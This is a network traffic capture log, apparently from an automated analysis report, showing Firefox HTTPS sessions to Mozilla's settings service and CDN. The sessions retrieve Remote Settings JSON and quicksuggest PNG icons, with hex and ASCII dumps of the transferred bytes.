2024-07-26 18:11:04 UTC	1390	IN	Data Raw: 13 c7 f4 77 59 c4 22 7c 66 3b 31 9f bf 7b e2 49 f7 a4 15 9c 06 8f 8b 17 c1 cd c0 72 e0 c7 d1 9c 25 50 d7 86 90 c7 80 8d 4a b1 43 84 03 b1 19 99 3a e8 b1 7c a1 eb b1 d0 73 99 b6 93 e8 55 85 bf 4e 39 5f d4 d4 b8 76 00 d8 01 6c 04 1e 4f 68 a9 14 ea de 11 74 89 52 ac 52 56 68 d2 37 43 ed 63 13 65 24 43 68 96 d9 ea 26 66 5f 84 e8 4a a5 d5 e5 75 48 d1 ba cf d3 1e 00 de 83 0e e9 56 82 26 b6 84 dd 29 70 92 08 c5 c5 89 92 a2 de 69 c3 79 66 b2 72 cc 3e 57 be 94 6b 2e 66 72 45 ef 62 75 38 a3 78 c5 32 57 2a c5 49 e8 c5 9c ca d0 d4 9e c0 97 d1 cb 93 67 91 bf 89 3b c1 78 2b 40 f5 16 09 cd 5e 5f 1b fd b8 93 b6 54 48 31 5a 53 dc dc ec 78 2f ba 5f ce 67 48 86 5e 08 4d 6f 0a dd 85 5e 4f b8 c1 75 31 a4 a7 ed 68 5e ac bc 0d 5f ec 21 45 cc 97 b5 de 7d 75 38 70 23 ba 3f 76 85 Data Ascii: wY"\|f;1{Ir%PJC:\|sUN9_vlOhtRRVh7Cce$Ch&f_JuHV&)piyfr>Wk.frEbu8x2W*Ig;x+@^_TH1ZSx/_gH^Mo^Ou1h^_!E}u8p#?v
2024-07-26 18:11:04 UTC	875	IN	Data Raw: 85 51 a1 59 35 d0 36 37 70 6b 4e 83 cf 62 2f 18 7b ca 7f cd c2 37 80 77 a2 df 75 dc 0f ee 05 59 09 7c cb 6e d3 49 ab 85 58 ac 40 84 d9 a6 24 6e db 24 c0 56 3b 21 c9 22 f7 eb e9 c7 45 38 15 fd e5 93 03 83 10 26 c2 7e e0 93 e8 47 d6 0a ea 23 d5 13 30 dd 56 f3 58 29 d6 2b c5 11 4d 4c ba 36 31 c0 32 e0 f8 fc 24 9f cd 76 10 c6 e5 a7 db a2 3f c3 2e f4 ab ea 7e 3d 64 3a 6f 02 4e 44 b1 db be 10 13 f9 b6 f4 32 ee 6f 21 0d 05 85 da 64 04 6e 33 db 07 cf cc 72 d0 6b e5 db 8f b0 1d e1 2c 54 65 8f 60 3d 8d fe a6 d2 79 64 2e a4 53 cc 4b f7 2f 41 92 35 e2 0d b4 49 02 68 06 08 58 f5 4a d1 c3 01 d6 ac bb 43 b4 21 99 f4 82 ca 21 e0 2a b4 61 f9 07 67 dc c2 61 2f 98 ae ad c5 30 eb 69 20 28 d4 16 06 58 aa 14 4b f2 13 bb 33 7d 69 16 be 06 ac 02 ee ab 80 be 10 fe 42 f6 4e 03 97 Data Ascii: QY567pkNb/{7wuY\|nIX@$n$V;!"E8&~G#0VX)+ML612$v?.~=d:oND2o!dn3rk,Te`=yd.SK/A5IhXJC!!*aga/0i (XK3}iBN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.5	64269	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:04 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:04 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2611 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:04 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:04 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.5	64270	34.117.121.53	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:04 UTC	334	OUT	GET /main-workspace/quicksuggest/41a4b1d8-9773-4011-ab45-8d749a67cebd HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:04 UTC	688	IN	HTTP/1.1 200 OK x-goog-generation: 1721840739189334 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 9243 x-goog-hash: crc32c=hyO/Aw== x-goog-hash: md5=59/ouVWZYuPUCPD/KvJJyA== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 9243 X-GUploader-UploadID: AHxI1nNmrCClmjHJ0edO_zf6ADcrQEQmqJToVPU-tSuFE0T65U_Z44-UN-4FBOfGlDR9uI0A9MpAVm5luA Server: UploadServer Date: Wed, 24 Jul 2024 17:30:09 GMT Cache-Control: public,max-age=604800 Last-Modified: Wed, 24 Jul 2024 17:05:39 GMT ETag: "e7dfe8b9559962e3d408f0ff2af249c8" Content-Type: application/octet-stream Age: 175255 Alt-Svc: clear Connection: close
2024-07-26 18:11:04 UTC	702	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 83 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 36 20 37 39 2e 31 36 34 37 35 33 2c 20 32 30 32 31 2f 30 32 2f 31 35 2d 31 31 3a 35 32 3a 31 33 20 20 Data Ascii: PNGIHDRL\tEXtSoftwareAdobe ImageReadyqe<iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: 70 3a 43 72 65 61 74 6f 72 54 6f 6f 6c 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 32 2e 33 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 66 65 62 61 62 62 62 61 2d 31 62 32 61 2d 34 64 62 38 2d 39 35 38 33 2d 36 30 31 33 38 30 36 38 66 39 30 66 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 61 63 39 34 62 34 34 39 2d 63 38 66 65 2d 33 64 34 36 2d 61 66 38 39 2d 31 39 65 33 31 62 34 36 66 64 64 30 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e Data Ascii: p:CreatorTool="Adobe Photoshop 22.3 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:febabbba-1b2a-4db8-9583-60138068f90f" stRef:documentID="adobe:docid:photoshop:ac94b449-c8fe-3d46-af89-19e31b46fdd0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: 5d 06 13 6f 37 df 7e 91 93 53 cf 5e bd be 4e 94 c9 66 47 45 46 06 1c 3f f1 38 31 11 7c 83 58 35 6a a1 4b a8 a8 00 43 74 c4 cf 57 9a e2 b6 54 00 04 07 05 6d 58 bd 06 e2 3e e2 b1 26 5c 8e c9 60 aa a9 ab 2d 70 70 70 5d b1 5c 57 4f ef ab 07 fb 20 0d 97 ce 5f 38 f2 e7 a1 e4 a4 64 50 62 b1 bc 34 c4 5d 60 36 8f 9f 3a 49 a7 d3 bf 34 00 61 c1 21 6b dc dd 21 c2 23 78 c7 60 3d 21 af 81 94 78 ea 8c e9 9b 36 6f ee f7 4d ff 36 95 73 41 de 1b 70 e2 84 cf 9f 87 c1 37 a8 aa a8 c8 11 8e 23 2a 2a 2a a6 4e 9b e6 1f 78 5a 32 3d 90 10 80 cb 97 22 dc 96 2e 85 40 82 20 f7 b1 74 c6 d8 d8 f8 17 cf 6d 33 ad ad db 6c ea fb f6 ed db 1d 5e de 97 2f 5d 02 8b 4a a3 d1 08 32 07 f4 00 6c 91 6f 80 bf 04 31 ae 24 00 dc 8b 89 59 68 37 0f 34 97 88 e5 c1 c2 06 08 31 ed 17 2c f0 dc ee dd 45 4b Data Ascii: ]o7~S^NfGEF?81\|X5jKCtWTmX>&\`-ppp]\WO _8dPb4]`6:I4a!k!#x`=!x6oM6sAp7#***NxZ2=".@ tm3l^/]J2lo1$Yh741,EK
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: d9 da cc 7e 92 98 48 9c fb 26 7d fa 04 85 85 6e dc b2 19 ee 0a 7d 3c 97 c7 bb 70 ee 1c 0e 00 51 11 11 38 2b 0f 02 01 c4 a6 2e 6e ae 62 89 bf dc e7 f5 e1 0b 67 cf 49 c3 a0 c2 82 82 bf af df 90 b8 09 07 4d 2f 5f bc 98 6b 6d 93 96 9a aa 4a a0 f2 88 71 df c8 d8 38 e4 6c 38 f8 e1 31 16 16 66 df 7d c7 41 2a 81 92 92 d2 9d 5b b7 21 ba 69 11 00 50 a2 db 37 6f a1 eb 39 1c 4e f5 f7 83 06 99 0f 19 22 96 f8 d7 dd c1 d5 e8 68 b8 6f 89 79 74 f1 fc 05 08 e9 5a 63 6b 5f 62 42 c2 bc d9 73 72 de bd 83 dc 93 08 f7 41 98 0c 7b f6 0c 0e 0f 37 30 34 c4 72 e3 f9 0e 0b 71 e3 d1 f7 ef df df bf 17 db 22 00 cf 9e 3e cb cc cc 44 37 9b 40 40 69 67 6f 8f 39 43 09 32 f8 ac cc ac db 37 6f 4a c6 23 d0 71 f0 22 ad 61 fd ef de be b3 c0 d6 0e c2 04 22 cd 06 18 f7 f5 f4 f5 43 c2 c3 8d 8c 8d Data Ascii: ~H&}n}<pQ8+.nbgIM/_kmJq8l81f}A*[!iP7o9N"hoytZck_bBsrA{704rq">D7@@igo9C27oJ#q"a"C
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: 74 19 09 00 50 56 51 1e 63 61 21 93 b3 09 87 96 e0 6e e2 60 31 3f 01 20 9c 2a cb e3 ca 21 01 a0 29 d0 1a e5 c9 b2 b2 0c 80 eb 95 a8 e8 46 eb 6b 70 c5 f0 d0 50 59 4d db 22 e8 90 8a 0a 8b 5c 9d 97 8a 5b 25 6c a9 2a 87 bb 8f ae 9a 53 fd af 0f 10 d4 0a f0 72 07 0a b9 a1 93 20 b2 55 8f 87 b7 91 41 4e b4 b1 2d 33 23 e3 f6 cd 5b f5 7f f9 38 21 11 52 04 5c 9d 13 4d 2f 93 d9 0a 01 70 ed ee 9d 3b db 3d 3d 65 02 27 be cb e1 f3 e4 c4 da 25 29 6e f0 07 cf 63 64 64 c4 c3 eb 15 90 13 8d 3f 3f 17 1e d6 30 fa 3c 53 5d 53 83 56 32 30 a3 9d 34 35 7b e8 ea 12 81 99 20 41 ae e0 e7 73 14 37 3b 91 21 91 b0 b0 14 d7 9e 60 c3 f2 88 9b 20 00 00 a4 c0 d1 79 09 c4 39 72 78 ba 02 09 c1 fd 7b b1 d9 6f df 62 3f 16 17 15 5f bf 76 8d 8e 17 7d b2 59 ac 69 33 a6 43 7e ce 25 80 31 71 9f 44 Data Ascii: tPVQca!n`1? !)FkpPYM"\[%lSr UAN-3#[8!R\M/p;==e'%)ncdd??0<S]SV2045{ As7;!` y9rx{ob?_v}Yi3C~%1qD
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: 3b 47 4d fc b7 57 08 bb cf 29 38 0b 3b 90 13 f9 fa 9f 80 af b8 d3 b0 c8 14 0a 70 70 95 db f2 0f c5 c5 cd 32 37 36 e6 1e 7a 0f 0f a4 14 83 07 0f fe 17 fe ba ef 20 5d 32 ee 6d 8c 76 92 82 da da 2b 51 d1 c4 9f bc e9 fb 01 c1 88 0f 1b 31 82 2d a6 27 00 b1 80 b4 65 be 83 24 7b 8c e5 f1 4c 10 46 fd fa f7 07 3d 20 b2 c2 03 e1 22 04 23 eb 7e 5c dd f4 c8 a7 8f 9f 64 a4 a7 a3 17 f2 68 54 ea b0 7a 3d ce a4 fa 9a 38 6c f8 08 34 00 90 19 c6 dc b9 43 b0 28 24 df c2 32 03 24 65 e2 2e 63 b1 98 cc f1 13 27 82 09 92 cc 79 20 9c 70 7d 82 38 6d cb d6 ad 0c 02 0e 59 55 4d 2d 3a 2a 6a df 9e 3d 8d fe 04 b9 42 0d 72 1d 09 0c 69 77 5d dd 6f eb bd 01 a5 81 89 b0 1c 67 85 46 4f d8 c9 93 9b fb f7 b5 eb c4 23 90 a6 34 61 e2 44 10 b7 1a 3c 65 6f 54 ba 72 5c bc 58 32 ee 83 14 d0 68 44 Data Ascii: ;GMW)8;pp276z ]2mv+Q1-'e${LF= "#~\dhTz=8l4C($2$e.c'y p}8mYUM-:*j=Briw]ogFO#4aD<eoTr\X2hD
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: 48 dc 4f 7d f5 6a de 9c b9 39 ef de d1 f1 2a b8 20 85 10 92 4c 9f 35 cb d9 c5 85 c8 99 c9 5e 5e 5e 44 8e 83 88 08 ce 1b 1b 13 83 1b 78 09 57 a0 28 94 7f 6e dc e0 f1 f9 a3 c6 8c ee 00 dc 4f 8c 8f 77 98 3f 3f 2f 37 8f 50 fd 9c c3 d1 d7 d7 3f 7d 26 88 e0 be 76 31 5e e6 09 26 c8 ce 66 f6 fd d8 58 c8 fd f0 37 fa d4 d6 56 31 18 0e 8e 8e 7b f7 ef 53 68 cf af 56 82 98 67 8d fb 2a f0 a8 44 2c 0f e4 4c c2 1d ce 17 ce 8f 20 3c e0 49 8c 6d aa 0a 0a 0a 47 7c 8f e9 e9 eb a3 5b 7f eb f4 00 7c 72 d0 e9 d3 a0 b9 ef df bf 6f a7 dc 3f 74 e0 80 cb e2 25 f0 bc 44 b8 2f 7c 71 18 93 e9 bd 63 c7 08 71 c6 6b 89 b7 4f 58 57 4f cf cf df 1f ee 86 60 8f ad 9a ba 7a ec bd 7b 33 26 4f b9 f9 f7 df ed ac d2 f0 e1 83 8b d3 62 ef 6d 9e 54 11 11 b1 13 90 87 ba ad 5c e9 bc cc 45 ac 0b 49 f2 Data Ascii: HO}j9* L5^^^DxW(nOw??/7P?}&v1^&fX7V1{ShVg*D,L <ImG\|[\|ro?t%D/\|qcqkOXWO`z{3&ObmT\EI
2024-07-26 18:11:04 UTC	201	IN	Data Raw: 0b f3 f3 99 2c 96 70 e4 9e 70 70 b8 70 3f 14 36 62 19 77 a8 0c 46 c2 84 8d 27 7c 23 83 f0 f5 1f 34 05 48 9e c1 bc 7c 37 68 d0 88 91 23 e0 ab 34 ef 23 ed b0 00 34 48 3e 99 cc ec ac b7 69 a9 42 ca cc c8 c8 7d ff be a4 a4 a4 aa b2 12 f2 3b ae e8 3d 17 c2 db ae 77 eb f2 9f 87 b3 60 af 8b 51 56 56 ee a4 a9 a9 a3 a3 63 d8 b3 67 9f be 7d fb f5 ef 67 dc bb 77 6b 07 94 1d 0a 80 a6 72 0d 11 54 59 69 59 59 59 69 45 79 79 65 65 25 84 ea 9c 6a 8e 70 9a a4 40 40 12 99 2c ba 12 1d 22 48 88 df 3b 01 69 6a 6a 68 68 b4 cd 60 b7 5d 02 d0 81 e9 7f 02 0c 00 c3 cc 5d 4f aa 5f cf 8b 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: ,pppp?6bwF'\|#4H\|7h#4#4H>iB};=w`QVVcg}gwkrTYiYYYiEyyee%jp@@,"H;ijjhh`]]O_IENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.5	64273	34.117.121.53	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:05 UTC	334	OUT	GET /main-workspace/quicksuggest/16ab4d01-9f0c-4fb9-bc87-cfcbe230a838 HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:05 UTC	688	IN	HTTP/1.1 200 OK x-goog-generation: 1721840739770812 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 7638 x-goog-hash: crc32c=XFtoEQ== x-goog-hash: md5=DSFDL5rOy/YwuTsS4hMfrQ== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 7638 X-GUploader-UploadID: AHxI1nMOq9_hZHFAPGDUZvmndHkxe9e-Es5GI_Df6bQQBNgFV8KQUT_ePjaYfDVEagS4gzxGG4d7Erfy1w Server: UploadServer Date: Wed, 24 Jul 2024 17:30:08 GMT Cache-Control: public,max-age=604800 Last-Modified: Wed, 24 Jul 2024 17:05:39 GMT ETag: "0d21432f9acecbf630b93b12e2131fad" Content-Type: application/octet-stream Age: 175257 Alt-Svc: clear Connection: close
2024-07-26 18:11:05 UTC	702	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 05 f7 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 36 20 37 39 2e 31 36 34 37 35 33 2c 20 32 30 32 31 2f 30 32 2f 31 35 2d 31 31 3a 35 32 3a 31 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 Data Ascii: PNGIHDR>apHYs+iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13 "> <rdf:RD
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 30 32 32 2d 30 36 2d 30 31 54 31 30 3a 32 39 3a 35 31 2d 30 34 3a 30 30 22 20 78 6d 70 3a 4d 65 74 61 64 61 74 61 44 61 74 65 3d 22 32 30 32 32 2d 30 36 2d 30 31 54 31 30 3a 32 39 3a 35 31 2d 30 34 3a 30 30 22 20 64 63 3a 66 6f 72 6d 61 74 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 70 68 6f 74 6f 73 68 6f 70 3a 43 6f 6c 6f 72 4d 6f 64 65 3d 22 33 22 20 70 68 6f 74 6f 73 68 6f 70 3a 49 43 43 50 72 6f 66 69 6c 65 3d 22 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 66 30 65 32 35 34 34 36 2d 37 66 62 61 2d 34 31 61 32 2d 62 35 31 62 2d 64 34 61 33 65 31 32 39 39 32 34 64 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f Data Ascii: 022-06-01T10:29:51-04:00" xmp:MetadataDate="2022-06-01T10:29:51-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:f0e25446-7fba-41a2-b51b-d4a3e129924d" xmpMM:DocumentID="adobe:docid:pho
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 4d 47 0e 36 b4 1b 08 bc 06 3c 16 e1 98 45 24 d4 a7 8e 68 74 38 7e 9a bb e9 b4 e9 ee f2 a5 b3 22 8f 7e a0 d5 7d 1c 18 68 4a 08 5d b9 71 bb 00 63 46 c6 d7 2d fc c0 bb 80 91 f7 3b 70 d9 2f df 28 7e e6 c1 b5 de b2 5f 6f 28 c9 f6 0e 1f 7c 20 2e 24 e2 8a b8 0b 6a a7 b7 1f 38 06 f0 02 e8 2b 6a 28 18 30 90 c8 38 9c 3c 3d b2 fd 92 f9 d1 7f 5b 36 c7 bd fb f0 7a f7 25 80 82 a7 71 9d c9 d5 05 4c 32 01 08 40 5d 4f 41 5f f3 2f 2f 97 fe fb dd ab 0b 47 ae da ec 85 95 9e 52 34 25 c2 de bf d2 df 68 c0 13 0a fd 01 68 98 da e2 f0 f1 a3 63 cf 5c b5 28 7e fb c2 29 ce c3 00 db fa 35 79 0f 1a e3 35 01 ec 83 fd 13 40 f9 26 96 fe 92 b9 fe 9b 2b f2 5f bc 63 65 61 da d6 ed 3e c4 85 fa b4 c2 3d 18 b5 be 13 02 62 c0 08 5d 79 83 e9 0b 70 d2 0e 57 1c 13 7b f1 7f 9f 1c ff fa 82 36 f7 17 Data Ascii: MG6<E$ht8~"~}hJ]qcF-;p/(~_o(\| .$j8+j(08<=[6z%qL2@]OA_//GR4%hhc\(~)5y5@&+_cea>=b]ypW{6
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 2f e5 79 6c 55 11 22 42 6b bd 2a 0b da ce 77 2a 69 c8 7b 70 c3 1f c5 67 2d 68 73 37 b6 e7 f4 b0 4f 14 f0 85 13 e3 56 ce 33 88 f5 16 c0 8c 68 b3 c2 df 24 fa 4f bf cb dd bc fd 5d 8f a6 69 91 0a 54 be 20 12 f6 eb fd ed 9a 68 5a f8 dc 92 24 9f 3b 2e ce 09 87 da ef e1 ce 39 22 c2 39 47 44 f8 d9 c2 22 d7 fc 72 80 1d 1d 9a 96 16 f5 5f 74 3f 5a 62 8e d0 97 d7 3c f6 66 e9 ef a7 d4 a9 cb 7a 0a 95 dd 10 b3 7e 85 64 97 bf 0a be b9 f6 1f 7e 5b c8 38 19 07 b1 ec cc 21 00 0a 3a b2 e1 62 fa e5 27 26 f8 f2 69 49 e6 b7 0e ce 95 87 3c 8b ac 73 f1 07 62 9c 7c 78 84 b3 7f d4 c3 9a cd 3e ad ad 8e 95 71 8d 36 d0 90 54 ac ed 08 2e 7d ad 3d 98 b9 a0 c5 d9 d8 55 a8 dc 6c a9 72 5d 40 b9 76 fe 79 65 71 db 9f 3f d0 3b b5 79 aa 63 d5 81 4f 44 08 0c 74 b7 fb 4c 9f 16 e1 db cb 52 7c f4 Data Ascii: /ylU"Bkwi{pg-hs7OV3h$O]iT hZ$;.9"9GD"r_t?Zb<fz~d~[8!:b'&iI<sb\|x>q6T.}=Ulr]@vyeq?;ycODtLR\|
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 02 df 37 a0 20 15 09 13 53 56 a2 99 19 b1 c9 6c dd b8 75 01 b8 4a 8a ca e6 cd a6 a0 bb 30 76 63 0b 5a 9d c1 9c 93 a3 46 ca 9f ef cc 86 b9 8d da 9a 1c a6 d6 39 e4 7d 78 bb 2b 60 20 ab 49 d4 87 f9 86 6d a6 b5 19 da 51 11 8a f6 ac 86 58 17 40 dc a5 3f ea 88 bd 6c 58 ae b0 ad 7f ec 57 f3 e4 e9 11 dc 3a 87 7e 1f ea 46 f1 ad 95 40 de 87 fe 4e cd 49 47 45 b9 ee 83 71 96 4c 8f 70 58 46 91 f7 61 cd 0e 9f bb 57 15 f9 f6 6f f3 e4 8b 86 d6 7a 07 1d d8 73 84 01 10 63 fa f7 f1 c6 03 c6 7a 57 5d 1f 53 dd 75 51 a1 a4 2d 75 01 a1 6f dc 98 d7 d8 c3 64 cf 0e c5 81 03 b7 a3 04 06 bc b0 f2 ff e2 43 49 56 5c 5d cf e5 0b 62 1c 96 09 2f 5f c2 85 13 0e 71 f9 d6 87 53 3c 79 65 86 b8 ab e8 ec d1 38 76 af 6e 49 23 dd 56 2d 52 01 01 34 26 64 47 26 26 04 96 d4 1f 8b c2 fa 1e cd c6 9e Data Ascii: 7 SVluJ0vcZF9}x+` ImQX@?lXW:~F@NIGEqLpXFaWozsczW]SuQ-uodCIV\]b/_qS<ye8vnI#V-R4&dG&&
2024-07-26 18:11:05 UTC	1376	IN	Data Raw: 61 a0 33 20 d5 e4 70 f5 a2 38 57 2d 8a b1 68 aa 9d 75 ae d7 3a 02 9e 5c 5f e2 67 eb 3c 96 6f 28 41 5e 13 6f 50 a4 63 8a 60 28 2a c8 de b7 32 d0 27 48 33 e1 b3 cf 77 a2 e3 86 26 6b e7 81 83 f8 c8 98 2f 3e 39 f0 f4 37 7e 9d 5b da 32 4d 55 c4 39 57 08 53 c8 74 e7 35 7e af c1 4d 3b 2c 9d e9 72 e6 ac 28 a7 cc 88 30 bf 59 d1 9c dc 77 83 d7 5b 34 bc d9 15 f0 6a 7b c0 1f b6 fb fc 6e ab cf ca ad 3e c5 5e 0d ae 50 97 16 12 6e e5 1e 00 69 8c 60 44 ae 06 f9 fe ee 5e ef ba a1 c1 ea f9 0e 9a 00 06 3c 33 63 fa 37 ba 37 65 73 83 e9 62 2b 77 2e 91 f0 09 df f9 7e 1d 66 03 4f 0a 87 65 1c a6 d7 0b d3 33 0e cd 49 45 c2 65 e8 79 95 fd 25 43 57 de b0 a5 37 60 db 80 61 4b af 26 c8 95 3f 1b 13 e2 09 45 32 5a 6e 98 2b f8 58 1b 83 20 98 55 06 73 ec 9e de d3 79 43 8b d5 73 1e c4 67 Data Ascii: a3 p8W-hu:\_g<o(A^oPc`(*2'H3w&k/>97~[2MU9WSt5~M;,r(0Yw[4j{n>^Pni`D^<3c77esb+w.~fOe3IEey%CW7`aK&?E2Zn+X UsyCsg

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.5	64272	34.149.100.209	443

Timestamp	Bytes transferred	Direction	Data
